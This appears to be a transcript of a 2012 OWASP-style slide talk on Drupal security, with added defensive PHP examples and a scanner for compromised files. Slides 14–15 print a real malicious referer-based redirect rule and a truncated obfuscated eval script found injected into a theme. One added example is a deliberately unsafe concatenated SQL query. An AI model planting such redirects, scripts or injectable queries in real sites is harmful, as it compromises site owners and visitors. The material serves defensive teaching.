
A Brief Analysis of Drupal Security

A Brief Analysis of Drupal Security. Andrew Welsh 21 Feb 2012. Presentation Overview. Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion. Introduction. whoami; Andrew.welsh@owasp.org. What is Drupal.





Presentation Transcript


  1. A Brief Analysis of Drupal Security Andrew Welsh 21 Feb 2012

  2. Presentation Overview Introduction What is Drupal Secure Drupal Code Drupal Configuration Personal Drupal Issues Conclusion

  3. Introduction • whoami; • Andrew.welsh@owasp.org

  4. What is Drupal Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work: (1) the Drupal core code base (2) thousands of contributed modules and themes

  5. What is Drupal Sites that use Drupal: Nasa The Economist Ubuntu 20th Century Fox Searchlight Warner Bros Recordings United Nations – End Poverty 2015 Yahoo! Research Amnesty International OpenOffice Extensions Popular Science AOL Corporate Nike Beijing Olympics White House

  6. Secure Drupal Code Form API (a CSRF attempt such as <img src="http://test.com/index.php?delete=12" /> does not work against it): It requires the form to be loaded (and a token issued) before a submission is accepted, making CSRF more difficult. It validates and sanitizes data from form submissions, making XSS more difficult.
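As an added example (not part of the slides), here is how a Drupal 7 module would expose a state-changing action through the Form API so that the token, validation and sanitization the slide describes all apply. The module name acme_notes, its table and its permission are assumptions; drupal_get_form(), confirm_form(), form_set_error(), db_delete() and the t() placeholders are the Drupal 7 core API.

```php
<?php
// Added example, not from the presentation. Hypothetical Drupal 7 module
// "acme_notes": all acme_notes_* names, the {acme_notes} table and the
// 'administer notes' permission are assumptions for illustration.

/**
 * Implements hook_menu().
 * The deletion is reached through drupal_get_form(), never through a bare
 * GET parameter, and the menu system checks the permission first.
 */
function acme_notes_menu() {
  $items = array();
  $items['acme/notes/delete/%'] = array(
    'title' => 'Delete note',
    'page callback' => 'drupal_get_form',
    'page arguments' => array('acme_notes_delete_form', 3),
    'access arguments' => array('administer notes'),
  );
  return $items;
}

/**
 * Form builder.
 * For logged-in users core adds a hidden form_token bound to the session
 * plus a form_build_id; a cross-site <img src="...?delete=12"> request
 * carries neither, so the submit handler is never reached.
 */
function acme_notes_delete_form($form, &$form_state, $note_id) {
  $form['note_id'] = array(
    '#type' => 'value',
    '#value' => (int) $note_id,
  );
  return confirm_form(
    $form,
    t('Delete note %id?', array('%id' => (int) $note_id)),
    'acme/notes',
    t('This action cannot be undone.'),
    t('Delete')
  );
}

/**
 * Validation handler: reject anything that is not a positive integer.
 */
function acme_notes_delete_form_validate($form, &$form_state) {
  if ($form_state['values']['note_id'] <= 0) {
    form_set_error('note_id', t('Invalid note id.'));
  }
}

/**
 * Submit handler: runs only after the token and validation checks pass.
 */
function acme_notes_delete_form_submit($form, &$form_state) {
  $note_id = $form_state['values']['note_id'];
  db_delete('acme_notes')->condition('id', $note_id)->execute();
  // @-placeholders are run through check_plain(), so nothing is echoed raw.
  drupal_set_message(t('Note @id deleted.', array('@id' => $note_id)));
  $form_state['redirect'] = 'acme/notes';
}
```

The point to check in a review is that every action that changes state goes through a form submit handler (POST plus token) rather than a page callback that reads $_GET, and that user-controlled values reach the page only through t() placeholders or check_plain().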

  7. Secure Drupal Code ACL / URL access (e.g. http://www.site.com/user/1/delete): the menu system handles permission checking, using user_access('administer nodes', $account) and node_access('edit', $node, $account). drupal_goto() calls are validated so that they only follow internal redirects.
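An added example (not from the slides) of the three mechanisms on this slide in a Drupal 7 module: a menu entry whose access callback combines a global permission with a per-node check, and a redirect helper that refuses external destinations. The module name acme_acl, its permission and its field are assumptions; hook_menu(), user_access(), node_access(), url_is_external() and drupal_goto() are Drupal 7 core.

```php
<?php
// Added example, not from the presentation. Hypothetical Drupal 7 module
// "acme_acl": all acme_acl_* names and the 'review content' permission are
// assumptions for illustration.

/**
 * Implements hook_permission(): declare the permission the menu checks.
 */
function acme_acl_permission() {
  return array(
    'review content' => array('title' => t('Review content before publication')),
  );
}

/**
 * Implements hook_menu().
 * %node is auto-loaded with node_load(); the access callback runs before
 * the page callback, so an unauthorised request gets a 403 from the router.
 */
function acme_acl_menu() {
  $items = array();
  $items['review/%node'] = array(
    'title' => 'Review',
    'page callback' => 'acme_acl_review_page',
    'page arguments' => array(1),
    'access callback' => 'acme_acl_review_access',
    'access arguments' => array(1),
  );
  return $items;
}

/**
 * Access callback: global permission AND per-node access.
 * node_access() consults hook_node_access() implementations and the
 * node_access grants table, so restrictions set by other modules
 * (private content, workflow states) are honoured instead of bypassed.
 */
function acme_acl_review_access($node, $account = NULL) {
  if (!user_access('review content', $account)) {
    return FALSE;
  }
  return node_access('update', $node, $account);
}

/**
 * Page callback: record the review, then redirect to a path we build
 * ourselves rather than one taken from the request.
 */
function acme_acl_review_page($node) {
  $node->acme_reviewed = REQUEST_TIME;   // assumed custom property
  node_save($node);
  drupal_set_message(t('%title marked as reviewed.', array('%title' => $node->title)));
  drupal_goto('node/' . $node->nid);
}

/**
 * Follow a caller-supplied return path only when it is internal.
 * url_is_external() rejects scheme-prefixed and protocol-relative (//host)
 * destinations, which is the check drupal_goto() relies on for ?destination=.
 */
function acme_acl_safe_goto($destination, $fallback = '<front>') {
  if (empty($destination) || url_is_external($destination)) {
    $destination = $fallback;
  }
  drupal_goto($destination);
}
```

When reviewing custom modules, look for page callbacks that check only user_access() on a route that operates on a specific node, and for drupal_goto() or header('Location:') calls fed directly from $_GET or $_POST.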

  8. Secure Drupal Code Authentication User sessions are destroyed and recreated upon logging out and logging in. Session IDs changed when permissions change. Auth cookies are not modifiable by site users. Passwords are salted and hashed.

  9. Secure Drupal Code Database API - to enforce security checks and good coding standards. Bind Parameters Named Placeholders
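To make the slide concrete, here is an added example (not from the presentation) contrasting string concatenation with named placeholders and the query builder in the Drupal 7 Database API. The acme_* function names are assumptions; db_query(), db_like(), db_select(), array placeholder expansion and the 'node_access' query tag are Drupal 7 core behaviour.

```php
<?php
// Added example, not from the presentation. All acme_* function names are
// assumptions; {node} is the core node table.

/**
 * UNSAFE: the search term is concatenated into the SQL text. A quote
 * character in $term changes the structure of the statement instead of
 * being treated as data.
 */
function acme_search_unsafe($term) {
  return db_query("SELECT nid, title FROM {node} WHERE title LIKE '%" . $term . "%'")
    ->fetchAllKeyed();
}

/**
 * SAFE: a named placeholder. The driver binds the value as a parameter, so
 * it can never alter the statement; db_like() escapes the LIKE wildcards
 * (% and _) that the bind alone would leave meaningful.
 */
function acme_search_safe($term) {
  return db_query(
    "SELECT nid, title FROM {node} WHERE title LIKE :pattern",
    array(':pattern' => '%' . db_like($term) . '%')
  )->fetchAllKeyed();
}

/**
 * Same query through the dynamic builder. Conditions are always bound, and
 * the 'node_access' tag makes hook_query_alter() apply node access rules,
 * so the result set only contains nodes the current user may see.
 */
function acme_search_builder($term, $limit = 10) {
  $query = db_select('node', 'n')
    ->fields('n', array('nid', 'title'))
    ->condition('n.title', '%' . db_like($term) . '%', 'LIKE')
    ->condition('n.status', 1)
    ->range(0, (int) $limit)
    ->addTag('node_access');
  return $query->execute()->fetchAllKeyed();
}

/**
 * Array placeholders: the API expands :ids to :ids_0, :ids_1, ... and binds
 * each element, so IN-lists never need a hand-rolled implode().
 */
function acme_load_titles(array $nids) {
  $nids = array_map('intval', $nids);
  if (empty($nids)) {
    return array();
  }
  return db_query(
    "SELECT nid, title FROM {node} WHERE nid IN (:ids)",
    array(':ids' => $nids)
  )->fetchAllKeyed();
}
```

A quick code-review grep for `db_query(` calls whose first argument contains `" .` or `' .` finds most of the concatenation cases; the fix is always to move the value into the placeholder array.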

  10. Drupal Configuration Configure logging appropriately, never display log errors to users. Never display db connection strings. Check watchdog report. Look at all administrator permissions. Watch input formats for comments, etc.
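The logging and connection-string points on this slide are set in settings.php. The following is an added example (not from the presentation) of a Drupal 7 sites/default/settings.php fragment; the $conf['error_level'] and $databases keys are core, while the database name, user and host are placeholders.

```php
<?php
// Added example, not from the presentation. Drupal 7 settings.php fragment;
// credential values are placeholders.

// Weak setting (the install default on many dev boxes):
//   $conf['error_level'] = 2;   // display all errors and warnings to visitors
// Hardened setting: hide errors from visitors. They are still written to
// watchdog, so they remain visible under Reports > Recent log messages.
$conf['error_level'] = 0;   // 0 = hide, 1 = errors only, 2 = all

// Database credentials live only here, never in a theme or module file and
// never in anything that is echoed to a page. Restrict the file itself:
// owned by the deploy user, group-readable by the web server only (mode 440).
$databases['default']['default'] = array(
  'driver'   => 'mysql',
  'database' => 'drupal_db',        // placeholder
  'username' => 'drupal_app',       // placeholder: a least-privilege DB user
  'password' => 'REPLACE_ME',       // placeholder
  'host'     => '127.0.0.1',
  'prefix'   => '',
);
```

The remaining items on the slide (administrator permissions, the text format allowed for comments) are reviewed in the admin UI rather than settings.php: check which roles hold "administer permissions", "administer users" and any "use text format" permission for a format that allows script or object tags.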

  11. Drupal Configuration (v5)

  12. Drupal Configuration Update Regularly!

  13. Personal Drupal Issues Public node access

  14. Personal Drupal Issues #336988# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L] </IfModule> #/336988#

  15. Personal Drupal Issues JS injection in page.tpl.php <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=179;} if(dbshre){ asd=0; try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";} catch(agdsg){asd=1;} if(!asd){e=eval;} ss=String; asgq=newArray(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54); s=\"\"; for(i=0;i-500!=0;i++){ if((020==0x10)&&window.document )s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4)); } z=s; e(s) } </script>
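Slides 14 and 15 show the two traces of a compromised site that the author ran into: a referer-conditional RewriteRule in .htaccess that sends visitors arriving from search engines to an off-site URL, and an obfuscated script (eval alias, fromCharCode, a long numeric array, backslash-escaped quotes) written into page.tpl.php. As an added example that is not part of the presentation, the read-only scanner below walks a docroot and flags both patterns; the acme_scan_* names, the indicator thresholds and the invocation path are assumptions.

```php
<?php
// Added example, not from the presentation. Read-only scanner for the two
// compromise patterns on the preceding slides. All acme_scan_* names are
// assumptions. Usage: php scan.php /var/www/drupal

/**
 * Findings for a .htaccess file: a RewriteRule redirecting to an external
 * URL that is guarded by a RewriteCond on HTTP_REFERER (the "only redirect
 * search-engine visitors" trick, which keeps the site owner from noticing).
 */
function acme_scan_htaccess($contents) {
  $findings = array();
  $lines = preg_split('/\r?\n/', $contents);
  $referer_cond = FALSE;
  foreach ($lines as $n => $line) {
    $line = trim($line);
    if (preg_match('/^RewriteCond\s+%\{HTTP_REFERER\}/i', $line)) {
      $referer_cond = $n + 1;
      continue;
    }
    if (preg_match('#^RewriteRule\s+\S+\s+(https?://[^\s\]]+)#i', $line, $m)
        && $referer_cond !== FALSE) {
      $findings[] = sprintf('line %d: referer-conditional redirect to %s (cond at line %d)',
        $n + 1, $m[1], $referer_cond);
    }
    // A RewriteCond only applies to the next RewriteRule, so reset after one.
    if (stripos($line, 'RewriteRule') === 0) {
      $referer_cond = FALSE;
    }
  }
  return $findings;
}

/**
 * Findings for a theme template: inline <script> blocks carrying at least
 * two of the obfuscation idioms. Requiring two keeps legitimate inline
 * scripts that merely mention eval from being reported.
 */
function acme_scan_template($contents) {
  $findings = array();
  if (!preg_match_all('#<script\b[^>]*>(.*?)</script>#is', $contents, $blocks)) {
    return $findings;
  }
  $indicators = array(
    'eval'              => '/\beval\b/',                      // also catches e=eval;
    'fromCharCode'      => '/fromCharCode/',
    'long numeric array' => '/Array\s*\((?:\s*\d+\s*,){20,}/i',  // matches "newArray(" too
    'escaped quotes'    => '/\\\\"/',   // \" inside a PHP template: written by a tool
  );
  foreach ($blocks[1] as $i => $body) {
    $hits = array();
    foreach ($indicators as $label => $re) {
      if (preg_match($re, $body)) {
        $hits[] = $label;
      }
    }
    if (count($hits) >= 2) {
      $findings[] = sprintf('script block %d: %s', $i + 1, implode(', ', $hits));
    }
  }
  return $findings;
}

/**
 * Walk a docroot and collect findings per file. Nothing is modified.
 */
function acme_scan_site($docroot) {
  $report = array();
  $it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS));
  foreach ($it as $file) {
    $path = $file->getPathname();
    $name = $file->getFilename();
    if ($name === '.htaccess') {
      $f = acme_scan_htaccess(file_get_contents($path));
    }
    elseif (substr($name, -8) === '.tpl.php') {
      $f = acme_scan_template(file_get_contents($path));
    }
    else {
      continue;
    }
    if ($f) {
      $report[$path] = $f;
    }
  }
  return $report;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
  foreach (acme_scan_site($argv[1]) as $path => $findings) {
    echo $path, "\n  ", implode("\n  ", $findings), "\n";
  }
}
```

A finding is a reason to compare the file against the copy in version control or the pristine Drupal/theme release, not a clean-up step in itself: the injected code is the symptom, and the entry point (an outdated module, weak FTP credentials, a writable docroot) is what the slide's "Update Regularly!" advice is about.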

  16. Conclusion Personal Thoughts: Drupal is a very good, well-used, peer-reviewed CMS and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or modules), always peer review.

  17. Thank You • Sources: • http://drupal.org/writing-secure-code • http://drupal.org/node/766404 • http://drupal.org/security/secure-configuration • http://www.mediacurrent.com/blog/drupal-security-review • http://www.slideshare.net/fourkitchens/is-drupal-secure • http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf • http://drupal.org/documentation/is-drupal-secure • http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks • Contact Info: • Andrew.welsh@owasp.org
